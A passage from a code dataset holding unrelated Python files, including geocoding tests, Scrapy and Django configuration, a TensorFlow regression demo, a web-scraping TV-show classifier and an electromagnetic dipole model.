'4.2565',\n 'housenumbers': {\n '3': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n },\n '3 bis': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n },\n '8': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n },\n }\n }\n process_documents(json.dumps(doc))\n result = search(input)[0]\n assert (result.type == 'housenumber') == bool(expected)\n if expected:\n assert result.housenumber == expected\n\n\ndef test_match_housenumber_with_multiple_tokens(config):\n config.SYNONYMS = {'18': 'dix huit'}\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue du 8 Mai',\n 'city': 'Troyes',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '8': {\n 'lat': '48.8',\n 'lon': '2.25651'\n },\n '10': {\n 'lat': '48.10',\n 'lon': '2.25651'\n },\n '18': {\n 'lat': '48.18',\n 'lon': '2.25651'\n },\n }\n }\n process_documents(json.dumps(doc))\n result = search('8 rue du 8 mai')[0]\n assert result.housenumber == '8'\n assert result.lat == '48.8'\n result = search('10 rue du 8 mai')[0]\n assert result.housenumber == '10'\n assert result.lat == '48.10'\n result = search('18 rue du 8 mai')[0]\n assert result.housenumber == '18'\n assert result.lat == '48.18'\n\n\ndef test_make_labels(config):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue des Lilas',\n 'city': 'Paris',\n 'postcode': '75010',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '1 bis': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n }\n }\n }\n process_documents(json.dumps(doc))\n result = Result(get_document('d|yyyy'))\n result.housenumber = '1 bis' # Simulate match_housenumber\n make_labels(None, result)\n assert result.labels == [\n '1 bis rue des Lilas 75010 Paris',\n 'rue des Lilas 75010 Paris',\n '1 bis rue des Lilas 75010',\n 'rue des Lilas 75010',\n '1 bis rue des Lilas Paris',\n 'rue des Lilas Paris',\n '1 bis rue des Lilas',\n 'rue des Lilas'\n ]\n\n\ndef test_make_municipality_labels(config):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'municipality',\n 'name': 'Lille',\n 'city': 'Lille',\n 'postcode': '59000',\n 'lat': '49.32545',\n 'lon': '4.2565',\n }\n process_documents(json.dumps(doc))\n result = Result(get_document('d|yyyy'))\n make_labels(None, result)\n assert result.labels == [\n 'Lille',\n '59000 Lille',\n 'Lille 59000',\n ]\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":7361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"494652649","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for ecommerce project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'ecommerce'\n\nSPIDER_MODULES = ['ecommerce.spiders']\nNEWSPIDER_MODULE = 'ecommerce.spiders'\n\n\nROBOTSTXT_OBEY = True\n\nITEM_PIPELINES = ['ecommerce.pipelines.MongoDBPipeline']\n\nMONGODB_SERVER = \"localhost\"\nMONGODB_PORT = 27017\nMONGODB_DB = \"ecommerce_data\" # NAME of database in MONGO_DB\n\nMONGODB_COLLECTION = \"rokomari1\"\n#MONGODB_COLLECTION = \"ecommerce_product_collection\"\n\nITEM_PIPELINES = {\n #'stack.pipelines.StackPipeline': 300,\n 'ecommerce.pipelines.MongoDBPipeline': 300,\n}\n\nDOWNLOAD_FAIL_ON_DATALOSS = False","sub_path":"MAIN FILES/ecommerce_sample - Latest_Main(09_12_17) - Copy/ecommerce/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"541170069","text":"import json\nimport logging\n\nfrom sqlalchemy import func\n\nfrom backend.blueprints.spa_api.errors.errors import CalculatedError\nfrom backend.database.objects import PlayerGame\nfrom backend.database.wrapper.query_filter_builder import QueryFilterBuilder\nfrom backend.database.wrapper.rank_wrapper import get_rank_number\nfrom backend.database.wrapper.stats.shared_stats_wrapper import SharedStatsWrapper\nfrom backend.utils.checks import ignore_filtering, is_local_dev\n\nlogger = logging.getLogger(__name__)\n\n\nclass GlobalStatWrapper(SharedStatsWrapper):\n \"\"\"\n A database wrapper for global stats. Acts additionally on global stats in addition to player stats\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n # this Object needs to be pooled per a session so only one is used at a time\n self.base_query = QueryFilterBuilder().with_relative_start_time(days_ago=self.get_timeframe()).with_team_size(\n 3).with_safe_checking().sticky()\n\n def get_global_stats(self, sess, with_rank=True):\n \"\"\"\n :return: A list of stats by rank for every field.\n \"\"\"\n results = {}\n if with_rank:\n ranks = list(range(20))\n else:\n ranks = [0]\n\n def float_maybe(f):\n if f is None:\n return None\n else:\n return float(f)\n\n for column, q in zip(self.stat_list, self.stats_query):\n column_results = []\n # set the column result\n self.base_query.clean().with_stat_query([PlayerGame.player, q.label('avg')])\n for rank in ranks:\n query = self.base_query\n if with_rank:\n query = query.with_rank(rank)\n query = query.build_query(sess)\n query = query.group_by(PlayerGame.player)\n if ignore_filtering():\n query = query.subquery()\n else:\n query = query.filter(PlayerGame.game != \"\").filter(PlayerGame.time_in_game > 0).having(\n func.count(PlayerGame.player) > 5).subquery()\n\n result = sess.query(func.avg(query.c.avg), func.stddev_samp(query.c.avg)).first()\n column_results.append({'mean': float_maybe(result[0]), 'std': float_maybe(result[1])})\n results[column.get_field_name()] = column_results\n return results\n\n def get_global_stats_by_rank(self, session, query_filter: QueryFilterBuilder, stats_query, stds_query,\n player_rank=None, redis=None, ids=None):\n \"\"\"\n Returns the global stats based on the rank of a player.\n\n Does modify the query_filter only setting rank.\n :param session: Session\n :param query_filter: a query filter.\n :param stats_query: A list of global stats\n :param stds_query: A list of global stats for standard deviations\n :param player_rank: The player that stats are associated with. Uses unranked if rank is not found\n :param redis: The local cache\n :return:\n \"\"\"\n\n if ids is None:\n # Set the correct rank index\n if player_rank is not None:\n if isinstance(player_rank, list):\n rank_index = get_rank_number(player_rank)\n else:\n rank_index = player_rank\n else:\n rank_index = 0\n\n # Check to see if we have redis available (it usually is)\n if redis is not None:\n stat_string = redis.get('global_stats')\n # Check to see if the key exists and if so load it\n if stat_string is not None:\n stats_dict = json.loads(stat_string)\n global_stats = [stats_dict[stat.get_field_name()][rank_index]['mean'] for stat in self.stat_list]\n global_stds = [stats_dict[stat.get_field_name()][rank_index]['std'] for stat in self.stat_list]\n return global_stats, global_stds\n if is_local_dev():\n rank_index = 0\n stats = self.get_global_stats(session, with_rank=False)\n global_stats = [stats[stat.get_field_name()][rank_index]['mean'] for stat in self.stat_list]\n global_stds = [stats[stat.get_field_name()][rank_index]['std'] for stat in self.stat_list]\n return global_stats, global_stds\n raise CalculatedError(500, \"Global stats unavailable or have not been calculated yet.\")\n else:\n query_filter.clean().with_replay_ids(ids)\n return (query_filter.with_stat_query(stats_query).build_query(session).first(),\n query_filter.with_stat_query(stds_query).build_query(session).first())\n\n @staticmethod\n def get_timeframe():\n \"\"\"Returns the number of days we accept old stats\"\"\"\n try:\n from flask import current_app\n return current_app.config['STAT_DAY_LIMIT']\n except:\n return 30 * 6\n\n\nif __name__ == '__main__':\n from backend.database.startup import startup\n\n engine, Session = startup()\n sess = Session()\n try:\n result = GlobalStatWrapper().get_global_stats(sess)\n print(result)\n except KeyboardInterrupt:\n sess.close()\n finally: # result = engine.execute()\n sess.close()\n","sub_path":"backend/database/wrapper/stats/global_stats_wrapper.py","file_name":"global_stats_wrapper.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"40138236","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/5/30 13:47\n# @Author : ZengC\n# @Email : njuzengc@foxmail.com\n# @File : Demo.py\n# @Software: PyCharm Community Edition\n\nimport numpy as np\nimport tensorflow as tf\n\ndef generate():\n x_data = np.linspace(-1,1,300)[:,np.newaxis]\n noise = np.random.normal(0, 0.05, x_data.shape)\n y_data = np.square(x_data) - 0.5 + noise\n return x_data,y_data\n\ndef add_layer(inputs, in_size, out_size, activation_function=None):\n weights = tf.Variable(tf.random_normal([in_size,out_size]))\n\n biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n\n\n Wx_plus_b = tf.matmul(inputs, weights) + biases\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n\nif __name__ == '__main__':\n x_data,y_data = generate()\n xs = tf.placeholder(tf.float32, [None, 1],)\n ys = tf.placeholder(tf.float32, [None, 1])\n h1 = add_layer(xs,1,20,activation_function=tf.nn.relu)\n prediction = add_layer(h1,20,1,None)\n\n loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction),reduction_indices=[1]))\n train_step = tf.train.GradientDescentOptimizer(0.05).minimize(loss)\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for i in range(2000):\n sess.run(train_step,feed_dict={xs:x_data,ys:y_data})\n if i%100 == 0:\n print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))","sub_path":"Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186058221","text":"from django.contrib import admin\n\nfrom .models import Category, Room, Plant\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n ordering = [\"slug\"]\n search_fields = [\"name\", \"slug\"]\n list_display = [\n \"name\",\n \"slug\",\n ]\n\n\nclass RoomAdmin(admin.ModelAdmin):\n ordering = [\"name\"]\n search_fields = [\"name\"]\n list_display = [\n \"name\",\n \"exposure\",\n \"temperature\",\n \"humidity\",\n \"draft\",\n ]\n\n\nclass PlantAdmin(admin.ModelAdmin):\n ordering = [\"room\", \"name\"]\n search_fields = [\"name\"]\n list_display = [\n \"name\",\n \"category\",\n \"room\",\n \"watering_interval\",\n \"fertilizing_interval\",\n \"last_watered\",\n \"last_fertilized\",\n \"required_exposure\",\n \"required_temperature\",\n \"required_humidity\",\n \"blooming\",\n \"difficulty\",\n ]\n\n list_filter = [\n \"category\",\n \"room\",\n \"blooming\",\n \"difficulty\",\n ]\n list_select_related = True\n\n autocomplete_fields = [\"category\", \"room\"]\n\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Room, RoomAdmin)\nadmin.site.register(Plant, PlantAdmin)\n","sub_path":"07_DRF/plants/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652830777","text":"class Solution:\r\n def convert(self, s: str, numRows: int) -> str:\r\n res = []\r\n \r\n if numRows == 1:\r\n return s\r\n \r\n cycle_len = 2 * numRows - 2\r\n for i in range(numRows):\r\n for j in range(0, len(s) - i, cycle_len):\r\n res.append(s[i + j])\r\n # Middle rows\r\n if (i != 0 and i != numRows - 1 and j + cycle_len - i < len(s)):\r\n res.append(s[cycle_len - i + j])\r\n \r\n return \"\".join(res)\r\n","sub_path":"solutions/6-zigzag-conversion/zigzag-conversion.py","file_name":"zigzag-conversion.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"91745650","text":"#!/usr/local/bin/python3\n\nimport math\nfrom pysig import *\n\nsig = DC(0,duration=0.0)\n\nmod = Div(Sine(2000),20)\n\n#for x in range(10):\nfor ss in range(10):\n\tnsig = Add(DC((ss-5)/10,duration=0.01),mod)\n\tsig = Cat(sig,nsig)\nfor sd in range(10):\n\tss= 10 - sd\n\tnsig = Add(DC((ss-5)/10,duration=0.01),mod)\n\tsig = Cat(sig,nsig)\n\n\n\nwrite(sig,sps=22050,name=\"stairs.wav\")","sub_path":"square_stairs.py","file_name":"square_stairs.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"445795096","text":"import pandas as pd\nimport os\nimport io \nimport cv2\nimport numpy as np\nfrom keras.models import load_model\nfrom .detector.face_detector import MTCNNFaceDetector\n#from detector import face_detector\nimport tensorflow as tf\n\n\nclass Diagnose():\n def __init__(self):\n pass\n\n \n def Image_croping(self , image , detect_model_path):\n \"\"\" return left eye and right eye image cropped\"\"\"\n ## loading wieghts\n fd = MTCNNFaceDetector(sess=tf.compat.v1.keras.backend.get_session(), model_path= detect_model_path) # loading face detection model\n face, lms = fd.detect_face(image) # detect the number of faces \n if len(face) == 1 : \n left_eye_im, right_eye_im = fd.cropImage(image,lms)\n return left_eye_im , right_eye_im , face\n if len(face) > 1 :\n return 'Multiple faces detected' , 'Multiple faces detected' , face\n return 'No face detected' , 'No face detected' , face\n\n\n def Eyes_diagnosis(self, left_eye_im , right_eye_im , diagnosis_model_path):\n\n \"\"\" return description and probability of disease for each eye\"\"\"\n diagnosis_model_path = os.path.join(os.path.dirname(__file__), diagnosis_model_path)\n model = load_model(diagnosis_model_path) # load disease detection model \n ############################# left eye #############################\n left_eye_im = cv2.resize(left_eye_im, (100, 100)) \n left_eye_im = left_eye_im.reshape(1 ,100 , 100 , -1)\n\n left_eye_im_diagnosis = model.predict(left_eye_im)\n\n if left_eye_im_diagnosis > 0.56:\n left_eye_im_desc = ' Left Eye : Cataract detected'\n else :\n left_eye_im_desc = 'Left Eye : No Cataract detected'\n\n\n ############################# right eye #############################\n right_eye_im = cv2.resize(right_eye_im, (100, 100))\n right_eye_im = right_eye_im.reshape(1 ,100 , 100 , -1)\n right_eye_im_diagnosis = model.predict(right_eye_im)\n\n if right_eye_im_diagnosis > 0.56:\n right_eye_im_desc = 'Right Eye : Cataract detected'\n else :\n right_eye_im_desc = 'Right Eye : No Cataract detected'\n\n return left_eye_im_desc ,left_eye_im_diagnosis[0], right_eye_im_desc , right_eye_im_diagnosis[0]\n\n def Diagnose_patient(self , image , detect_model_path , diagnosis_model_path):\n \n \"\"\" return croped eye image, diagnosis descripition and probability for both eyes ( 6 output items) \"\"\"\n \n left_eye_im , right_eye_im , face = self.Image_croping(image , detect_model_path) # crop eyes & ensure image is good for diagnosis\n\n if len(face) != 1 :\n return left_eye_im , left_eye_im, left_eye_im , left_eye_im , left_eye_im , left_eye_im \n\n left_eye_im_desc ,left_eye_im_diagnosis, right_eye_im_desc , right_eye_im_diagnosis = self.Eyes_diagnosis(left_eye_im , right_eye_im , diagnosis_model_path) # diagnosis \n\n return left_eye_im , left_eye_im_desc , left_eye_im_diagnosis , right_eye_im , right_eye_im_desc , right_eye_im_diagnosis\n","sub_path":"build/lib/GazeML_keras/diagnose.py","file_name":"diagnose.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"472914078","text":"import json\nimport unittest\n\nimport mock\n\nfrom service.app import create_app\nfrom service.auth import encode_auth_token\nfrom service.database import empty_db\n\n\nclass TestAuth(unittest.TestCase):\n\n def test0(self):\n user_id = 1\n # create token\n new_token = encode_auth_token(user_id)\n\n _app = create_app(debug=True)\n empty_db(_app)\n with _app.test_client() as client:\n with mock.patch('service.views.reactions.exist_story') as exist_story_mock:\n exist_story_mock.return_value = True\n reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + new_token})\n body = json.loads(str(reply.data, 'utf8'))\n self.assertEqual(int(body['reaction']), 1)\n self.assertEqual(body['reply'], 'Reaction created!')\n self.assertEqual(int(body['story_id']), 1)\n\n # wrong token\n reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + 'a'})\n body = json.loads(str(reply.data, 'utf8'))\n self.assertEqual(int(body['reaction']), 1)\n self.assertEqual(body['reply'], 'Provide a valid auth token!')\n self.assertEqual(int(body['story_id']), 1)\n\n # wrong token: 'Bearer token malformed!'\n reply = client.post('/reactions/1/1/1', headers={'Authorization': 'a'})\n body = json.loads(str(reply.data, 'utf8'))\n self.assertEqual(int(body['reaction']), 1)\n self.assertEqual(body['reply'], 'Bearer token malformed!')\n self.assertEqual(int(body['story_id']), 1)\n","sub_path":"service/tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"169723657","text":"#encoding:utf-8\n\n\nimport jieba\n\ndef seg_corpus(content, seg_filename='./seg_corpus.txt'):\n\n #载入停用词\n with open('./stopwords.txt', 'rb') as f_stop:\n f_stop_word = f_stop.read().decode('utf-8', 'ignore')\n f_stop_word = f_stop_word.split('\\n')\n # print(f_stop_word)\n\n print(\"载入停用词成功!\")\n\n with open(seg_filename, 'w', errors='ignore') as fw:\n for i in range(0, len(content)):\n seg_list = []\n for word in jieba.cut(content[i], HMM=False):\n if word not in f_stop_word:\n seg_list.append(word)\n\n fw.write(' '.join(seg_list))\n\n print(\"分词和去停用词完成!\")\n\n#test\n# content = ['今天阳光明媚,微风吹拂这湖面,我哼着小曲走在郊区弯弯曲曲的小路上,树上鸟儿的歌声优雅动听!']\n# # print(type(content))\n# a = seg_corpus(content,'./seg_corpus.txt')\n# print(type(a))\n\n","sub_path":"data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"492610638","text":"import re\nfrom bs4 import BeautifulSoup\nimport douban\nimport requests\nimport difflib\nfrom pathos.multiprocessing import ProcessPool as Pool\nimport pandas as pd\nfrom nameprocess import cleantitle\n\ndef namenormalize(name):#对爬虫得到的节目名称进行清洗以便爬虫搜索\n cut = re.compile('.*?剧场:|.*?剧场:|大结局.*|.*?转播|【.*?】|\\(.*?\\)|(.*?)')\n name = cut.sub('', name)\n cut = re.compile('(.+?)(\\d+)')\n find = cut.findall(name)\n if find: \n name = find[0][0]\n if int(find[0][1])>=15:\n return [name,['电视剧']]\n return name\n\n#对爬虫不易搜到的冷门节目的处理\ndef stbn(name):#search type by name\n label = []\n cut = re.compile('资讯|新闻|报道|看点')#1\n find = cut.findall(name)\n if find:\n label.append('新闻')\n cut = re.compile('天气|气象')#2\n find = cut.findall(name)\n if find:\n label.append('天气')\n cut = re.compile('财富|财经')#3\n find = cut.findall(name)\n if find:\n label.append('财经')\n cut = re.compile('健康|养生')#4\n find = cut.findall(name)\n if find:\n label.append('养生')\n#只对纪录片、动画片进行分类的原因是在豆瓣纪录片一般没有进一步的分类,所以去除它们的爬虫可以节约时间。\n cut = re.compile('纪录片')#5\n find = cut.findall(name)\n if find:\n label.append('纪录片')\n cut = re.compile('动画片')#6\n find = cut.findall(name)\n if find:\n label.append('少儿')\n cut = re.compile('联欢|晚会|盛典|春晚')#7\n find = cut.findall(name)\n if find:\n label = label + ['音乐','歌舞','真人秀']\n cut = re.compile('世界杯|足球|英超|中超|中甲|意甲')#8\n find = cut.findall(name)\n if find:\n label = label + ['足球','体育','赛事']\n cut = re.compile('NBA|篮球')#9\n find = cut.findall(name)\n if find:\n label = label + ['篮球','体育','赛事']\n cut = re.compile('体育')#10\n find = cut.findall(name)\n if find:\n label.append('体育')\n return list(set(label))\n\n#在电视猫对冷门电视节目进行爬虫(不用豆瓣因为电视剧、电影以外的电视节目如《齐鲁先锋》、《谢谢你》等众多冷门节目难以搜到,电视猫则更加专业)\n#同时正好利用电视猫以及优酷给电视剧、电影、综艺等预先贴上简单标签,为之后豆瓣爬虫大大提高准确性\ndef stcat(show,tag=[]):#search type in tvcat\n headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0','Connection':'close'}\n req = requests.get(headers = headers, url = 'https://www.tvmao.com/query.jsp?keys='+show+'&ed=bOS4h%2BWutueBr%2BeBq28%3D')\n html = req.content.decode('utf-8')\n server = 'https://www.tvmao.com'\n cut1 = re.compile('
  • ')\n cut2 = re.compile('

    ')\n cut3 = re.compile('

    ')\n cut4 = re.compile('

    ')\n cut5 = re.compile('.+? 分类:(.+?)')\n inf = cut.findall(html)\n if inf:\n return inf[0][1].split(' ')\n return ['综艺',0]\n if type_ == 'drama':\n return ['电视剧',0]\n if type_ == 'movie':\n return ['电影',0]\n \n#用优酷给电视猫搜索不到的节目贴上简单标签,为豆瓣爬虫提高准确性\ndef styk(show):#search type by youku\n headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0','Connection':'close'}\n req = requests.get(url = 'http://www.soku.com/search_video/q_'+show+'?spm=a2hww.20027244.#qheader_search~10',headers = headers)\n html = req.content.decode('utf-8')\n bf = BeautifulSoup(html, \"lxml\")\n server = 'http://www.youku.com'\n item = bf.find_all('div', class_='s_dir')\n if item == []:\n return 0\n else:\n type_ = item[0].find_all('span', class_= 'base_type')\n if type_ == []:\n return 0\n else:\n type_ = type_[0].text\n return type_\n\n#在豆瓣进行电视剧、电影、热门综艺类型的标签爬虫,与附件二中标签方式相同\ndef stdb(show,tag,dbtppool):#search type by douban \n return list(douban.doubanget([[show,tag]],dbtppool))\n\ndbtppool = douban.dbippool()\n\n#对单个节目的标签处理\ndef st(show,dbtppool):#search type\n show = namenormalize(show)\n tag = []\n if isinstance(show,list):\n tag = show[1]\n show = show[0]\n bn = stbn(show)\n if bn:\n return bn\n stc = stcat(show,tag)\n if (len(stc)==1) or(not (stc == [] or stc[1] == 0)):\n return stc\n if not stc == []:\n tag = stc[0]\n else:\n tag = styk(show)\n if tag == 0:\n return(show+'标签失败!')\n db = stdb(show,tag,dbtppool)\n if not db == []:\n return db[0]+[tag]\n print(show+'标签失败!')\n return []\n\n#批量处理\ndef label(showlist,dbtppool):\n showlist = list(map(cleantitle,showlist))\n swaptable = pd.DataFrame({'showlist':showlist})\n sorted_table = swaptable.sort_values(by='showlist')\n sortedlist = sorted_table['showlist'].values\n showlist_dedup = douban.deduplicate(sortedlist, mode=1)\n new_showlist = showlist_dedup[0]\n index_key = showlist_dedup[1]\n index_key.append(len(showlist))\n if douban.test_net():\n sections = len(showlist) // 10\n i = 0\n j = 0\n labels = []\n pool = Pool()\n while(i < sections):\n try:\n #为了显示完成的进度,此处可去掉注释\n# if sections != 0:\n# print('已完成%.2f' % (i/sections*100) +'%')\n labels += pool.map(st,new_showlist[10*i:10*(i+1)],[dbtppool]*10)\n i += 1\n pool.clear()\n except:\n pool.clear()\n j += 1\n if j >= 5:\n print('加标签出错!')\n break\n continue\n j = 0\n while(i == sections):\n try:\n #为了显示完成的进度,此处可去掉注释\n# if sections != 0:\n# print('已完成%.2f' % (i/sections*100) +'%')\n labels += pool.map(st,new_showlist[10*i:],[dbtppool]*10)\n i += 1\n pool.clear()\n except:\n pool.clear()\n j += 1\n if j >= 5:\n print('加标签出错!')\n break\n continue\n else:\n print('网络出错,请检查网络!')\n new_labels = douban.redup(labels,index_key)\n sorted_table['labels'] = new_labels\n real_table = sorted_table.sort_index()\n real_labels = real_table['labels']\n return list(real_labels)\n\n","sub_path":"雷打不动的论文和附件/提交的附件/别点/千万别点/附件/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"300157704","text":"# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom solar.dblayer.model import StrInt\nfrom solar.dblayer.solar_models import HistoryItem\nfrom solar.dblayer.solar_models import NegativeCounter\n\n\ndef test_composite_filter():\n\n l1 = HistoryItem.new('a', {'log': 'history', 'resource': 'a'})\n l2 = HistoryItem.new('b', {'log': 'history', 'resource': 'b'})\n\n l1.save()\n l2.save()\n assert HistoryItem.composite.filter({'log': 'history',\n 'resource': 'a'}) == [l1.key]\n assert HistoryItem.composite.filter({'log': 'history',\n 'resource': 'b'}) == [l2.key]\n\n\ndef test_negative_counter():\n nc = NegativeCounter.get_or_create('non_exist')\n assert nc.count == 0\n\n\ndef test_reversed_order_is_preserved():\n added = []\n for i in range(4):\n li = HistoryItem.new(str(i), {})\n li.save()\n added.append(li.key)\n added.reverse()\n assert list(HistoryItem.history.filter(StrInt.n_max(),\n StrInt.n_min(),\n max_results=2)) == added[:2]\n","sub_path":"solar/dblayer/test/test_log.py","file_name":"test_log.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"352346143","text":"import numpy as np\nfrom scipy.constants import mu_0\nimport properties\nfrom scipy.special import iv, kv\nfrom geoana.em.base import BaseMagneticDipole\nfrom geoana.em.fdem.base import BaseFDEM\n\n\nclass MagneticDipoleHalfSpace(BaseMagneticDipole, BaseFDEM):\n \"\"\"Harmonic magnetic dipole in a half space.\n\n Only valid for source and receivers at the surface. The surface is assumed\n to be at z=0.\n \"\"\"\n\n frequency = properties.Array(\n \"Source frequency (Hz)\",\n shape=('*', ),\n dtype=float\n )\n\n @properties.validator(\"location\")\n def _check_source_height(self, change):\n if change[\"value\"][2] != 0.0:\n raise ValueError(\"Source must be at the surface of the earth (z=0)\")\n\n def magnetic_field(self, xy, field=\"secondary\"):\n \"\"\"Magnetic field due to a magnetic dipole over a half space\n\n The analytic expression is only valid for a source and receiver at the\n surface of the earth. For arbitrary source and receiver locations above\n the earth, use the layered solution.\n\n Parameters\n ----------\n xy : numpy.ndarray\n receiver locations of shape (n_locations, 2)\n field : (\"secondary\", \"total\")\n Flag for the type of field to return.\n \"\"\"\n sig = self.sigma_hat # (n_freq, )\n f = self.frequency\n w = 2*np.pi*f\n k = np.sqrt(-1j*w*mu_0*sig)[:, None] # This will get it to broadcast over locations\n dxy = xy[:, :2] - self.location[:2]\n r = np.linalg.norm(dxy, axis=-1)\n x = dxy[:, 0]\n y = dxy[:, 1]\n\n em_x = em_y = em_z = 0\n src_x, src_y, src_z = self.orientation\n # Z component of source\n alpha = 1j*k*r/2.\n IK1 = iv(1, alpha)*kv(1, alpha)\n IK2 = iv(2, alpha)*kv(2, alpha)\n if src_z != 0.0:\n em_z += src_z*2.0/(k**2*r**5)*(9-(9+9*1j*k*r-4*k**2*r**2-1j*k**3*r**3)*np.exp(-1j*k*r))\n Hr = (k**2/r)*(IK1 - IK2)\n angle = np.arctan2(y, x)\n em_x += src_z*np.cos(angle)*Hr\n em_y += src_z*np.sin(angle)*Hr\n\n if src_x != 0.0 or src_y != 0.0:\n # X component of source\n phi = 2/(k**2*r**4)*(3 + k**2*r**2 - (3 + 3j*k*r - k**2*r**2)*np.exp(-1j*k*r))\n dphi_dr = 2/(k**2*r**5)*(-2*k**2*r**2 - 12 + (-1j*k**3*r**3 - 5*k**2*r**2 + 12j*k*r + 12)*np.exp(-1j*k*r))\n if src_x != 0.0:\n em_x += src_x*(-1.0/r**3)*(y**2*phi + x**2*r*dphi_dr)\n em_y += src_x*(1.0/r**3)*x*y*(phi - r*dphi_dr)\n em_z -= src_x*(k**2*x/r**2)*(IK1 - IK2)\n\n # Y component of source\n if src_y != 0.0:\n em_x += src_y*(1.0/r**3)*x*y*(phi - r*dphi_dr)\n em_y += src_y*(-1.0/r**3)*(x**2*phi + y**2*r*dphi_dr)\n em_z -= src_y*(k**2*y/r**2)*(IK1 - IK2)\n\n if field == \"secondary\":\n # subtract out primary field from above\n mdotr = src_x*x + src_y*y# + m[2]*(z=0)\n\n em_x -= 3*x*mdotr/r**5 - src_x/r**3\n em_y -= 3*y*mdotr/r**5 - src_y/r**3\n em_z -= -src_z/r**3 # + 3*(z=0)*mdotr/r**5\n\n return self.moment/(4*np.pi)*np.stack((em_x, em_y, em_z), axis=-1)\n","sub_path":"geoana/em/fdem/halfspace.py","file_name":"halfspace.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498416540","text":"from itertools import permutations\nn=int(input())\nk=int(input())\nsource=[]\nfor a in range(1,n+1):\n source.append(a)\ntarget=list(permutations(source,n))\ntarget.sort()\nres=\"\"\nfor i in targer[k-1]:\n res=res+str(i)\nprint(res)\n ","sub_path":"Code/CodeRecords/2163/60636/246681.py","file_name":"246681.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"359121669","text":"\"\"\"\nmain.py creates, trains, and tests machine learning models when provided with test & training data sets.\n\nAuthors/Contributors: Dr. Dimitrios Diochnos, Conner Flansburg\n\nGithub Repo:\n\"\"\"\nimport pathlib as path\nimport typing as typ\nimport numpy as np\nimport pandas as pd\nfrom sklearn.svm import SVC\nimport sys\nimport logging as log\nimport traceback\nfrom sklearn.metrics import accuracy_score\nfrom pyfiglet import Figlet\n\n\nSEED: int = 498\nHDR = '*' * 6\nSUCCESS = u' \\u2713\\n'+'\\033[0m' # print the checkmark & reset text color\nOVERWRITE = '\\r' + '\\033[32;1m' + 